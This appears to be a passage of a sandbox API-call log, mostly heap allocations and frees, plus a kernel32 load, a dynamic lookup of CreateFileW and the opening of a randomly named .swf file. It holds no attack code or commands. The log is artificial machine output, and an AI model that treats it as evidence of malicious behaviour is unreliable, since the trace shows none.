RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0134.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2620 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0134.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0134.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0134.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0134.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0134.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0134.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0134.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0134.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392650 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0134.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0134.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0134.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0134.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0134.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0134.479] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0134.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0134.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0134.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0134.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0134.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0134.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0134.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0134.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0134.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0134.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0134.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0134.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0134.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0134.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0134.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0134.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0134.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0134.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0134.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0134.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0134.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0134.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0134.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0134.482] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0134.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0134.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0134.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0134.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0134.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0134.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0134.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0134.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0134.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0134.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0134.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0134.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0134.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0134.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0134.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0134.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0134.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0134.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0134.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0134.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0134.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0134.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0134.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0134.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0134.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0134.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0134.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0134.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0134.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0134.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0134.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0134.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0134.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0134.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0134.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0134.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0134.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0134.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0134.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0134.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0134.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0134.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0134.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0134.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0134.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0134.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0134.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0134.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0134.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0134.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0134.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0134.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0134.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0134.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0134.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0134.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0134.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0134.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0134.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0134.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0134.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0134.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0134.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0134.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0134.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0134.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.554] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0134.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0134.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0134.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0134.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae80 [0134.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cae80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0134.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0134.554] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0134.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0134.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0134.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0134.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0134.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0134.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0134.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0134.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0134.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0134.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0134.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0134.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0134.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0134.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0134.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0134.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0134.555] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\MjT96UMRMqqhF.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\mjt96umrmqqhf.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0134.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0134.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0134.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0134.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0134.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0134.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0134.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0134.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: 